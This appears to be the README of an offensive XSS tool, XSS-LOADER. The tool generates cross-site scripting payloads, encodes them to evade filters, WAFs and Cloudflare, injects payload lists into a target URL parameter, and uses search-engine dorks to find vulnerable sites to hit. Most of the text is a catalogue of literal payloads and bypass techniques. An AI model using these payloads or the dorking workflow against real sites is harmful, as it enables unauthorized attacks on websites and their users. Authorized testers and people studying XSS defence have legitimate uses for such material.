Automatic XSS Vulnerability Scanner, Dorker, and Payload Injector

Primary LanguagePythonCreative Commons Zero v1.0 UniversalCC0-1.0




📒 Read Me 📒

  • This tool creates payload for use in xss injection
  • Select default payload tags from parameter or write your payload
  • It makes xss inj. with Xss Scanner parameter
  • It finds vulnerable sites url with Xss Dork Finder parameter

💿 Installation 💿

Installation with requirements.txt

git clone https://github.com/capture0x/XSS-LOADER/
pip3 install -r requirements.txt


python3 payloader.py

🗃️ Features 🗃️

*Basic Payload

Sets default parameter to :<script>alert(1)</script>

*Div Payload

Sets default parameter to :<div onpointerover='alert(1)'>MOVE HERE</div

*Img Payload

Sets default parameter to :<img src=x onerror=alert('1');>

*Body Payload

Sets default parameter to :<body ontouchstart=alert(1)>

*Svg Payload

Sets default parameter to :<svg onload=alert('1')>

*Enter Your Payload

Encodes payload writed by user

*Payload Generator Parameter

Encodes payload on selected tag

* |   1.  UPPER CASE---->  <SCRIPT>ALERT(1)</SCRIPT>              
* |   2.  UPPER AND LOWER CASE----> <ScRiPt>aleRt(1)</ScRiPt>   
* |   3.  URL ENCODE ----->   %3Cscript%3Ealert%281%29%3C%2Fscript%3E           
* |   4.  HTML ENTITY ENCODE----->  &lt;script&gt;alert(1)&lt;/script&gt; 
* |   5.  SPLIT PAYLOAD ----->  <scri</script>pt>>alert(1)</scri</script>pt>>       
* |   6.  HEX ENCODE ----->  3c7363726970743e616c6572742831293c2f7363726970743e       
* |   7.  UTF-16 ENCODE -----> Encode payload to utf-16 format.   
* |   8.  UTF-32 ENCODE----->  Encode payload to utf-32 format.          
* |   9.  DELETE TAG -----> ";alert('XSS');//            
* |  10.  UNICODE ENCODE----->    %uff1cscript%uff1ealert(1)%uff1c/script%uff1e         
* |  11.  US-ASCII ENCODE ----->  ¼script¾alert(1)¼/script¾      
* |  12.  BASE64 ENCODE ----->   PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==          
* |  13.  UTF-7 ENCODE ----->   +ADw-script+AD4-alert(1)+ADw-/script+AD4-           
* |  14.  PARENTHESIS BYPASS ----->  <script>alert`1`</script>   
* |  15.  UTF-8 ENCODE ----->  %C0%BCscript%C0%BEalert%CA%B91)%C0%BC/script%C0%BE          
* |  16.  TAG BLOCK BREAKOUT-----> "><script>alert(1)</script>
* |  17.  SCRIPT BREAKOUT----->  </script><script>alert(1)</script>
* |  18.  FILE UPLOAD PAYLOAD-----> "><script>alert(1)</script>.gif
* |  19.  INSIDE COMMENTS BYPASS-----> <!--><script>alert(1)</script>-->
* |  20.  MUTATION PAYLOAD-----> <noscript><p title="</noscript><script>alert(1)</script>">
* |  21.  MALFORMED IMG-----> <IMG """><script>alert(1)</script>">
* |  22.  SPACE BYPASS-----> <img^Lsrc=x^Lonerror=alert('1');>
* |  23.  DOWNLEVEL-HIDDEN BLOCK-----> <!--[if gte IE 4]><script>alert(1)</script><![endif]-->
* |  24.  WAF BYPASS PAYLOADS-----> Show Waf Bypass Payload List
* |  25.  CLOUDFLARE BYPASS PAYLOADS-----> Show Cloudflare Bypass Payload List
* |  26.  POLYGLOT PAYLOADS-----> Show Polyglot Bypass Payload List
* |  27.  ALERT PAYLOADS-----> Show Alert Payload List
* |  28.  ALL CREATE PAYLOAD-----> Show Create All Payloads
* |  30.  EXIT

*Xss Scanner

Initially you'll need to enter url of target Please enter the url like this example==>e.g target -----> http://target.com/index.php?name= Selected for scanning payload list

  • BASIC PAYLOAD LIST ==> Payload list consisting of script tag
  • DIV PAYLOAD LIST ==> Payload list consisting of div tag
  • IMG PAYLOAD LIST ==> Payload list consisting of img tag
  • BODY PAYLOAD LIST ==> Payload list consisting of body tag
  • SVG PAYLOAD LIST ==> Payload list consisting of svg tag
  • MIXED PAYLOAD LIST ==> Payload list consisting of all tag
  • ENTER FILE PATH ==> Payload list determined by the user ,Please enter the url like this example..! (e.g. path -----> /usr/share/wordlists/wfuzz/Injections/XSS.txt)

Results will be added in "vulnpayload.txt" after scanning.

*Xss Dork Finder

First enter the dork for searching: e.g---->inurl:"search.php?q=" Results will be saved in "dork.txt" after scanning.

Known Issues


  • Unicode errors

  • Module errors

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Copyright 2020